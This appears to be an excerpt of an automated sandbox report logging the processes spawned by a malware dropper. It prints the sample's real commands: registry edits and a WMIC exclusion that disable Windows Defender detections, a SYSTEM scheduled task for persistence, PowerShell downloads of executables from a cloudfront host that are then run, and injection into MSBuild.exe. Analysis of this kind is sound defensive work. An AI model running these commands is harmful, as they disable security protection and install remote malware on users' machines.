Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Code function: 8_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

8_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 672C1000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F1E008

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\i1.exe i1.exe /SUB=2838 /str=one	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\i3.exe i3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Process created: C:\Users\user\AppData\Local\Temp\u2xs.0.exe "C:\Users\user\AppData\Local\Temp\u2xs.0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Process created: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe "C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Process created: C:\Users\user\AppData\Local\Temp\u2xs.3.exe "C:\Users\user\AppData\Local\Temp\u2xs.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn biPxHmULFllsbMgnpt
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
